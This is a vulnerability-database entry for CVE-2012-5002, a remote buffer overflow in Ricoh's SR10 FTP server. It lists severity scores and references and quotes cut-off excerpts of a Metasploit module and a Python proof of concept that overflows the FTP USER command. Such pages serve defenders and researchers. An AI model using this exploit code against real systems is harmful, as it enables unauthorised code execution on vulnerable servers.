CVE-2012-5002
published 2012-09-19CVE-2012-5002: Stack-based buffer overflow in SR10 FTP server (SR10.exe) 1.1.0.6 in Ricoh DC Software DL-10 4.5.0.1, when the Log file name option is enabled, allows remote…
PriorityP352medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
31.16%
98.0th percentile
Stack-based buffer overflow in SR10 FTP server (SR10.exe) 1.1.0.6 in Ricoh DC Software DL-10 4.5.0.1, when the Log file name option is enabled, allows remote attackers to execute arbitrary code via a long USER FTP command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ricoh | dl-10 | — | — |
| ricoh | sr10_ftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)
exploitdb·2012-03-24
CVE-2012-5002 Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)
Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
service. By supplying a long string of data to the USER command, it is
possible to trigger a stack-based buffer overflow, which allows remote code
execution under the context of the user.
Please note that in order to trigger the vulnerability, the se
Exploit-DB
Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow
exploitdb·2012-03-22
CVE-2015-6750 Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow
Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow Vulnerability
# Version: <= 1.1.0.6
# Date: 2012-02-05
# Author: Julien Ahrens
# Homepage: www.inshell.net
# Software Link: http://www.ricohpmmc.com
# Tested on: Windows XP SP3 Professional German
# Notes: Capftpd (former SR-10) is vulnerable too
# Howto: "Log file name" has to be set
import socket,sys
import os
target="192.168.0.1"
port=21
junk1 = "\x41" * 245
boom = "\x42\x42\x42\x42"
junk2 = "\x43" * 50
payload = junk1 + boom + junk2
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print
Metasploit
Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
metasploit
Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP service. By supplying a long string of data to the USER command, it is possible to trigger a stack-based buffer overflow, which allows remote code execution under the context of the user. Please note that in order to trigger the vulnerability, the server must be configured with a log file name (by default, it's disabled).
http://secunia.com/advisories/47912http://security.inshell.net/advisory/5http://www.osvdb.org/79691http://www.securityfocus.com/bid/52235https://exchange.xforce.ibmcloud.com/vulnerabilities/73591http://secunia.com/advisories/47912http://security.inshell.net/advisory/5http://www.osvdb.org/79691http://www.securityfocus.com/bid/52235https://exchange.xforce.ibmcloud.com/vulnerabilities/73591
2012-09-19
Published